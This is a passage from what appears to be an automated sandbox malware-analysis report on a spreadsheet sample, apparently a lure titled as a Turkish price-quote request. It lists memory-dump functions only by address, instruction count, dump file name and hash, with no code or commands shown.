                                                  Function 05E02C76 Relevance: 1.3, Strings: 1, Instructions: 39COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 9
                                                  • API String ID: 0-2366072709
                                                  • Opcode ID: 4e37f74c3c7434fb4af98b8a482c65a652d4af79939f81a9910a940c2d2e01a2
                                                  • Instruction ID: 6dc46ce71e8b83a36023a19858848ad3b226301658c9d5d5e061f064a246138f
                                                  • Opcode Fuzzy Hash: 4e37f74c3c7434fb4af98b8a482c65a652d4af79939f81a9910a940c2d2e01a2
                                                  • Instruction Fuzzy Hash: 9911D0B4D4022ADFDB60CF64C894BEDBBB1AB48314F00A1E99559A7680EB305EC5DF00
                                                  Function 057EC8E0 Relevance: 1.3, Strings: 1, Instructions: 30COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: w
                                                  • API String ID: 0-476252946
                                                  • Opcode ID: d8435d52dcd577bc01ad67fe70a910d2c8a50f985305bd74df180335347da199
                                                  • Instruction ID: 3e7e994ab0c0b08b541e2ce228a815d078efdcd4df64e495e6dfb87cc0706ce1
                                                  • Opcode Fuzzy Hash: d8435d52dcd577bc01ad67fe70a910d2c8a50f985305bd74df180335347da199
                                                  • Instruction Fuzzy Hash: 5DF08CB59193489FD742DFA8D84528CBBF8FB0D201F1400E6E448D3262E2309D00DB41
                                                  Function 05E02BB7 Relevance: 1.3, Strings: 1, Instructions: 27COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: A
                                                  • API String ID: 0-3554254475
                                                  • Opcode ID: 4bc54112d4288e5655847e92efa75cbe17b62543b8d44c0dd287156ef4783866
                                                  • Instruction ID: 9bfa5073464cd69c2d187a06680e42e84758f1baf1130f05e83475838a473b37
                                                  • Opcode Fuzzy Hash: 4bc54112d4288e5655847e92efa75cbe17b62543b8d44c0dd287156ef4783866
                                                  • Instruction Fuzzy Hash: BA01AFB491622A9FCF64EF64D958BDDBBB1BB48700F0051E9A609A7251DB301E81CF04
                                                  Function 05E03F26 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID: 0-3916222277
                                                  • Opcode ID: adcaaf87177839f15de3804aa345e43c379723d75e0a44379a846b31604ed9af
                                                  • Instruction ID: 6d98dbb2345f6da0eb81fe93b6b1df7af36b08ea9e80a69f55e626348a6ece2b
                                                  • Opcode Fuzzy Hash: adcaaf87177839f15de3804aa345e43c379723d75e0a44379a846b31604ed9af
                                                  • Instruction Fuzzy Hash: 2BF07AB690121DEFDB50CF95CD44FDDB7B9FB08304F10819AA509A7291D7759A86CF20
                                                  Function 05E02EF1 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: A
                                                  • API String ID: 0-3554254475
                                                  • Opcode ID: 4c1f0876e42cea7d245be433f2aab8f67b75b293fc6dc86cfdf90f1ec13bd830
                                                  • Instruction ID: 8dc6ec929e1fa6174d465d7a7298de7bb944df3390d2230214bd556916dfc993
                                                  • Opcode Fuzzy Hash: 4c1f0876e42cea7d245be433f2aab8f67b75b293fc6dc86cfdf90f1ec13bd830
                                                  • Instruction Fuzzy Hash: 32F06DB891622A9BDF61DF64D958BDDBBB1BB48700F0061A5A549A3280DB741EC1CF04
                                                  Function 05E217C2 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063678264.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e20000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: M
                                                  • API String ID: 0-3664761504
                                                  • Opcode ID: e6200e3c5fd295594a8ecee7f35bd00a0317537c1fcded4ede87b11f46849610
                                                  • Instruction ID: b5f2be066416bb952d56b0592ba54e7a8ee5efcb8020ce9546d1e3d8cd941d7e
                                                  • Opcode Fuzzy Hash: e6200e3c5fd295594a8ecee7f35bd00a0317537c1fcded4ede87b11f46849610
                                                  • Instruction Fuzzy Hash: A0F058B094426ACFEB20DF19D848BEAB6B2FB05304F0054EAD02CA36C4DB785EC49F01
                                                  Function 057E6351 Relevance: 1.3, Strings: 1, Instructions: 21COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: I
                                                  • API String ID: 0-3707901625
                                                  • Opcode ID: 5d928af4c316541093789a4a0bf1fe837c0f5570abb46dd0853183d80d7ede99
                                                  • Instruction ID: 13d18ce3a74bbc407e3c6cd0d6fa44f78137fee16e8474676851459ccfd1076d
                                                  • Opcode Fuzzy Hash: 5d928af4c316541093789a4a0bf1fe837c0f5570abb46dd0853183d80d7ede99
                                                  • Instruction Fuzzy Hash: 9FF05F74901228CFDB61DF64D888BEEBBB2AB09311F1451D9D409A2241CB755AC4DF44
                                                  Function 05E032B0 Relevance: 1.3, Strings: 1, Instructions: 20COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: "
                                                  • API String ID: 0-123907689
                                                  • Opcode ID: 6b1cf860f66137382d23852de81034ba12196d5e91029b924d05cbe6f8c98004
                                                  • Instruction ID: 3ed30dd8bd19d47eefaabd0c40e85ee9593b669bc8c2ec3158dd8521fadf73d4
                                                  • Opcode Fuzzy Hash: 6b1cf860f66137382d23852de81034ba12196d5e91029b924d05cbe6f8c98004
                                                  • Instruction Fuzzy Hash: E6F0393180061BDBCF129F54D814ADEBB71FF58300F00868AE95933210EB30AAD6CF80
                                                  Function 05AD371D Relevance: 1.3, Strings: 1, Instructions: 18COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: P
                                                  • API String ID: 0-3110715001
                                                  • Opcode ID: 8ba9c4a56ebdbb4e18394071004c5dec2dd28162d652c29380748635c08be941
                                                  • Instruction ID: 9459d7f7c9a6af5873677b0cbac0de29b9ad6748e5e6f406721df710517f9f7b
                                                  • Opcode Fuzzy Hash: 8ba9c4a56ebdbb4e18394071004c5dec2dd28162d652c29380748635c08be941
                                                  • Instruction Fuzzy Hash: 80F0C974C4836B8FCB619F14D95CBE9BBB1BB06319F1044E6E42A96251D7344E84DF12
                                                  Function 057E74E9 Relevance: 1.3, Strings: 1, Instructions: 10COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: j
                                                  • API String ID: 0-2137352139
                                                  • Opcode ID: e311e8dabb207095a6599d95867ee8dd3bd513712e71ff9e3e5e55bdcba62406
                                                  • Instruction ID: 29bc701ea7f21b5d15f174b732b0e9d0c10a26f895add54cfa9f471136fbac6b
                                                  • Opcode Fuzzy Hash: e311e8dabb207095a6599d95867ee8dd3bd513712e71ff9e3e5e55bdcba62406
                                                  • Instruction Fuzzy Hash: ACD092B4E002188FDB10DF55C888A9DBBB6AF9A300F1050998484B7311DB7099818F0A
                                                  Function 05AE3048 Relevance: .4, Instructions: 437COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c423706fa69b960bce3a5ff0294dc108ee01efc24bab94b5bd49abadc107acd9
                                                  • Instruction ID: 4b36165d6774a77d496b1cce1b90d3a490afc59a023ca7873b3e730fecea74f0
                                                  • Opcode Fuzzy Hash: c423706fa69b960bce3a5ff0294dc108ee01efc24bab94b5bd49abadc107acd9
                                                  • Instruction Fuzzy Hash: DE12FB34B102198FCB14EF68C994A9DBBB2BF89300F5185A9D44AAB365DF70ED85CF50
                                                  Function 05AE2340 Relevance: .3, Instructions: 342COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 99252e99ff50bcd396201295efd76c14a66a43899d40a79459e6d007288516d6
                                                  • Instruction ID: 3e20ab15a015bc2679bca1589126e659defadb587b77b0dc81f7e39f417102fe
                                                  • Opcode Fuzzy Hash: 99252e99ff50bcd396201295efd76c14a66a43899d40a79459e6d007288516d6
                                                  • Instruction Fuzzy Hash: 94B17D7A540515EFCB0ACF94D944D95BBB2FF49310B0A81D4E6096F232C732E9A1EF91
                                                  Function 05AE7050 Relevance: .3, Instructions: 264COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 40ec02ec2ef078a350b8031c92a9430b13624a74aae0dbfb59b4a95a170f75d8
                                                  • Instruction ID: 599fce369b89f4eb6365a0897b06c0d920bf9e4961c8982ce852a05231ceac0b
                                                  • Opcode Fuzzy Hash: 40ec02ec2ef078a350b8031c92a9430b13624a74aae0dbfb59b4a95a170f75d8
                                                  • Instruction Fuzzy Hash: 25A19131A046969FCB25CF29C454E3ABBF2FF85310F298569E9968B751CB30EC42DB41
                                                  Function 057E85B8 Relevance: .3, Instructions: 252COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a1534277058c54af26c944a01ca163c5c208bdf7089257ca949c93692e13d026
                                                  • Instruction ID: 71eadded8e3d586910268e99f897f47c565b483310db071adbb778793ca99570
                                                  • Opcode Fuzzy Hash: a1534277058c54af26c944a01ca163c5c208bdf7089257ca949c93692e13d026
                                                  • Instruction Fuzzy Hash: 82B11374E05218CFDB00DFA9D8986AEBBB6FF49300F10812AD416AB395DB345D46EF52
                                                  Function 05E017E1 Relevance: .2, Instructions: 227COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0a8c83d521d76d909b67bbcbb670f2eb2eb0f4bdbbf122bfa9b48ba66565974b
                                                  • Instruction ID: 138b0553e8f4251da579a1752c8248a77a5ee0d38238c7cb97bded2b45d21ff4
                                                  • Opcode Fuzzy Hash: 0a8c83d521d76d909b67bbcbb670f2eb2eb0f4bdbbf122bfa9b48ba66565974b
                                                  • Instruction Fuzzy Hash: 5CA10A74E02218CFDB58DFA9D884BADBBB2FB49304F10A0A9D449AB395DB345D81CF10
                                                  Function 05ADB498 Relevance: .2, Instructions: 222COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f8bca51c93a8260dd8c1968965ff3e521d1bfc58a59796c028bdeb51183ec914
                                                  • Instruction ID: 956a4e19ea5a13c9875fc37c9462fd27fddac38de4494d00a5267708f3670418
                                                  • Opcode Fuzzy Hash: f8bca51c93a8260dd8c1968965ff3e521d1bfc58a59796c028bdeb51183ec914
                                                  • Instruction Fuzzy Hash: AD817935B122088FCB14EFA5D559AADBBB2FF89351F158069E8129B390CB35D902CF70
                                                  Function 05AE3FF0 Relevance: .2, Instructions: 220COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ba745bb4c0a844e7004e22a25da6183b4fd0f9c40e0d73c922e5508a9197f363
                                                  • Instruction ID: 058f578e93dc491589f58e9a8bed8d925e35b3156569b93fb72af438d63888dd
                                                  • Opcode Fuzzy Hash: ba745bb4c0a844e7004e22a25da6183b4fd0f9c40e0d73c922e5508a9197f363
                                                  • Instruction Fuzzy Hash: F9812B34B106149FCB14DF68D898E6DBBB6BF89700F1541A9E916DB3A5CB34EC42CB90
                                                  Function 05E00812 Relevance: .2, Instructions: 219COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 228fb70efaa8c6c21774f2b4e9fb65c9663ec70d5fc4c595876a4d9ea11b2847
                                                  • Instruction ID: 2d744e19145258b18ba4e22dce2c15caf01a24912e067574e7c205bd5809d460
                                                  • Opcode Fuzzy Hash: 228fb70efaa8c6c21774f2b4e9fb65c9663ec70d5fc4c595876a4d9ea11b2847
                                                  • Instruction Fuzzy Hash: 82B11B74A02219CFEB64EF69D894BADBBB2FB49300F5091AAD04EA7354DB345D81CF11
                                                  Function 05AE2138 Relevance: .2, Instructions: 209COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f4bffc881f9112efc3fce6cb24c2a42877b8b86b51145f4c7539c4b3909682ed
                                                  • Instruction ID: c8baf412010236188271d1118e52fdae064634beb3a8c29523b4289f26ad6843
                                                  • Opcode Fuzzy Hash: f4bffc881f9112efc3fce6cb24c2a42877b8b86b51145f4c7539c4b3909682ed
                                                  • Instruction Fuzzy Hash: 70517E36B001189FCF15DF54D844EA9BBB6FF89310F0580A5EA09AB272C732ED56DB91
                                                  Function 05AE3FE1 Relevance: .2, Instructions: 182COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: adca1f1f4b95f1170d828cd05ac26e6ee88a87cccd273c21c813aad2db0b8ea2
                                                  • Instruction ID: 0a69ef9773265dd35f7b2c5739b8ccec5ee4d685711b3c9c02855008279986b5
                                                  • Opcode Fuzzy Hash: adca1f1f4b95f1170d828cd05ac26e6ee88a87cccd273c21c813aad2db0b8ea2
                                                  • Instruction Fuzzy Hash: 37713934B142149FCB15DF68D898E6DBBB6BF49710F1581A9E816DB3A5CB30EC42CB90
                                                  Function 05AEBC80 Relevance: .2, Instructions: 180COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 94feaa1032193b002b8efc0e7f64de314c9a64353371ebb6ad80112b2d71e69c
                                                  • Instruction ID: ce0cea62e2a459d98565190e0413d84f0904aeadd163b5dc72283a0b849f45ec
                                                  • Opcode Fuzzy Hash: 94feaa1032193b002b8efc0e7f64de314c9a64353371ebb6ad80112b2d71e69c
                                                  • Instruction Fuzzy Hash: 0571A3B4D0621CCBDB14DFAAE588BEDBBB2FB49304F14902AD409A7255DB785885CF24
                                                  Function 031169AA Relevance: .2, Instructions: 177COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2e6dcd55476dcd234fa87a4e99b0c15dd26d1f4d78d632f625dbf753a24c5dbd
                                                  • Instruction ID: d106c2f663cd7c14bf89879322c485c25c49d93a996d9a4fcba9a98362922b5c
                                                  • Opcode Fuzzy Hash: 2e6dcd55476dcd234fa87a4e99b0c15dd26d1f4d78d632f625dbf753a24c5dbd
                                                  • Instruction Fuzzy Hash: 15710930A05218CFD718CF48D684FD9F7B2FB88310F5682B5E90A5B3A9D775A895CB80
                                                  Function 05AEBC90 Relevance: .2, Instructions: 176COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5562e957558c3b6f0a5f4442e23c2235ce1a1add625e9261dbdcb5c8cca80e38
                                                  • Instruction ID: 28e5d29a1f8faea9bdb55fb8623871a5b40174e32be078e66e4478c3ef1b2276
                                                  • Opcode Fuzzy Hash: 5562e957558c3b6f0a5f4442e23c2235ce1a1add625e9261dbdcb5c8cca80e38
                                                  • Instruction Fuzzy Hash: 5D71B2B4D0621CCBDB14DFAAE488BEDBBF2FB49304F14902AD409A7255DB785885CF24
                                                  Function 05AEBC87 Relevance: .2, Instructions: 175COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7706eeba972711adad063d3ce5ab88856e890baae3f9f5ed965e67de7d854377
                                                  • Instruction ID: ed1ab89891f8829a1e90d6ddc5c5493b5960559cf16c75b606d82c4b85a59a60
                                                  • Opcode Fuzzy Hash: 7706eeba972711adad063d3ce5ab88856e890baae3f9f5ed965e67de7d854377
                                                  • Instruction Fuzzy Hash: 9871B2B4D0621CCBDB14DFAAE488BEDBBF2FB49304F14906AD409A7255DB785885CF24
                                                  Function 057EC648 Relevance: .2, Instructions: 163COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 002c782a389b2527d74e32f65150f9174bce46c184ed24208af9f3b3ac71ec43
                                                  • Instruction ID: 11213fb6b49fc60eaee64aa919299d42850fabc7b3b581f816f6becf1bfa320c
                                                  • Opcode Fuzzy Hash: 002c782a389b2527d74e32f65150f9174bce46c184ed24208af9f3b3ac71ec43
                                                  • Instruction Fuzzy Hash: 1661CE78E01208DFDB05CFA9D588AEEBBB6FF89305F10906AE419A7254D7345E41CF91
                                                  Function 057EC638 Relevance: .2, Instructions: 163COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 29c2ae5a0c4c377ef641afb78e65623abb25ccbcfcdbfa08c0a8aa92d0b30f8c
                                                  • Instruction ID: 991e11b1214c6ac59e8273bff36f819845369165fa250ef3ddc0d45aec7bbb0e
                                                  • Opcode Fuzzy Hash: 29c2ae5a0c4c377ef641afb78e65623abb25ccbcfcdbfa08c0a8aa92d0b30f8c
                                                  • Instruction Fuzzy Hash: D56101B8E05208DFDB06CFA9D588AEEBBB6FF89300F10906AE409A7254D7305D41CF91
                                                  Function 03115408 Relevance: .2, Instructions: 154COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 132c25373510a5fabe17389c684763e197445d15ce9ecd9c30cb035e730f54d9
                                                  • Instruction ID: 933a89242f60e4c434bef0cdc82dab2642a2ea67326d317d9f88e4f589e46936
                                                  • Opcode Fuzzy Hash: 132c25373510a5fabe17389c684763e197445d15ce9ecd9c30cb035e730f54d9
                                                  • Instruction Fuzzy Hash: 4F514630A05108CFCB14CB9AD480BDEB7B3FB89315F5581B5D40AAB659E738AC91DB50
                                                  Function 03117A98 Relevance: .2, Instructions: 151COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 24ee8d9eb6ed7fd4f6d29463efdb9fa1debda5582df33870ade1abe4bf167b0b
                                                  • Instruction ID: adb949dad323123b29175370d2c4bc8e3de80623fdcaaef9357404aaeb4dedd2
                                                  • Opcode Fuzzy Hash: 24ee8d9eb6ed7fd4f6d29463efdb9fa1debda5582df33870ade1abe4bf167b0b
                                                  • Instruction Fuzzy Hash: 9A514670A01104DFDB04CF69E988BEAB7F2EB8C301F1944B5E506AB3A5CB799D95CB40
                                                  Function 057E8D98 Relevance: .2, Instructions: 150COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3fb0022d684c85b8fde70de7cafd87874bf56da992974558ce615b1db18d66d4
                                                  • Instruction ID: db4a0c12a4f045c616c495af88d985b9fe972f405ca8b41faf082969d2dee613
                                                  • Opcode Fuzzy Hash: 3fb0022d684c85b8fde70de7cafd87874bf56da992974558ce615b1db18d66d4
                                                  • Instruction Fuzzy Hash: F651CCB4E14259DFCB04DFA8D4849ACBBF2FB4D311F20456AE406BB352DB316941EB52
                                                  Function 05E00A63 Relevance: .2, Instructions: 150COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
